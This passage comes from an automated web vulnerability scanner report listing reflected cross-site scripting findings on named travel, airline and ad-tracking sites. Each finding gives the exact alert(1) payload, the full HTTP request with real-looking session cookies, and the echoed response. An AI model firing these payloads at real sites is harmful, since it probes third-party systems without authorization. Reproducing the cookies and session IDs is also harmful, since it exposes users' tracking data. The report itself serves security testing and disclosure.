Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:11 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9575
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:10:11 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
               returnDate=yyyymm9d4b7--><script>alert(1)</script>bbc12be6325dd    
           -->
...[SNIP]...

4.416. http://www.travelocity.com/popWindow2 [toYear parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the toYear request parameter is copied into an HTML comment. The payload c880d--><script>alert(1)</script>e0acc4fd6b7 was submitted in the toYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--><script>alert(1)</script>e0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:23 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9575
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:23 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
               returnDate=yyyyc880d--><script>alert(1)</script>e0acc4fd6b7mmdd    
           -->
...[SNIP]...

4.417. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [pubid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The value of the pubid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eea4"%3balert(1)//0a881cfe5b9 was submitted in the pubid parameter. This input was echoed as 9eea4";alert(1)//0a881cfe5b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f9eea4"%3balert(1)//0a881cfe5b9 HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=424937091139EAD10A8AF0C7310701E7.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2427

var DrfGlobals = {
   sid:"bfa7dd53-c988-458c-86df-52443affccb8", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f9eea4";alert(1)//0a881cfe5b9", // publisher id
   pti:"default", // page type id
   src:"none", // source
   ppi:"eaa76413-f885-4a4e-9fa2-b1caba8ec34b", // page impression id
   version:"v1.0",
   cdnLocation:"http://drf-global.com/se
...[SNIP]...

4.418. http://www9.effectivemeasure.net/v4/em_js [ns parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The value of the ns request parameter is copied into the HTML document as plain text between tags. The payload 13916<script>alert(1)</script>131d16d4f4e was submitted in the ns parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em13916<script>alert(1)</script>131d16d4f4e&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:54:36 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=6c50a866261632f39839b9e202024e62e18088e413-981323754e88f9bc; expires=Wed, 26-Sep-2012 23:54:36 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=3e7357252679c073d84af13bd6fa4e88f8d57af834-210214684e88f9bc338_5280; expires=Mon, 03-Oct-2011 00:24:36 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 350
Date: Sun, 02 Oct 2011 23:54:36 GMT
Server: C20

_em13916<script>alert(1)</script>131d16d4f4e._domain="goal.com";_em13916<script>alert(1)</script>131d16d4f4e.setCkHl();_em13916<script>alert(1)</script>131d16d4f4e.setCkVt("6c50a866261632f39839b9e2020
...[SNIP]...

4.419. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22361"-alert(1)-"16a37850c5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=22361"-alert(1)-"16a37850c5c
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4329B7D811FB937AEC454AE93204607C; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.google.com/search?hl=en&q=22361"-alert(1)-"16a37850c5c",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5
...[SNIP]...

4.420. http://www.turkishairlines.com/static/css/ui-lightness/jquery-ui-1.8.14.custom.css [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/css/ui-lightness/jquery-ui-1.8.14.custom.css

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aa46a<script>alert(1)</script>1f4e3095ba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /static/css/ui-lightness/jquery-ui-1.8.14.custom.css HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.google.com/search?hl=en&q=aa46a<script>alert(1)</script>1f4e3095ba
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
<title>404</title>
<meta http-equiv=Content-Type content="text/html;
...[SNIP]...
<br>We suggest you try one of the links
below:http://www.google.com/search?hl=en&q=aa46a<script>alert(1)</script>1f4e3095ba
</p>
...[SNIP]...

4.421. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 700d9<script>alert(1)</script>da933ef47aa was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282700d9<script>alert(1)</script>da933ef47aa

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=99&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:36 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282700d9<script>alert(1)</script>da933ef47aa', "ar_72bcd37b8f9f0348a793175": 'exp=1&initExp=Mon Oct 3 00:00:22 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&', "BMX_3PC": '1', "ar_p119936314'": 'exp=1&initExp=Mon Oct 3 00:
...[SNIP]...

4.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload dfc14<script>alert(1)</script>6b4829181d5 was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&dfc14<script>alert(1)</script>6b4829181d5; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:35 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=87&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:35 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:35 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
p=Mon Oct 3 00:00:35 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&', "ar_p108883753": 'exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&dfc14<script>alert(1)</script>6b4829181d5', "ar_p82806590": 'exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:
...[SNIP]...

4.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload 33a3b<script>alert(1)</script>5947cd7d417 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&33a3b<script>alert(1)</script>5947cd7d417; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=81&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:34 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:34 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
41&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&33a3b<script>alert(1)</script>5947cd7d417', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282', "ar_72bcd37b8f9f0348a793175
...[SNIP]...

4.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload 71ebb<script>alert(1)</script>cbdc459a308 was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
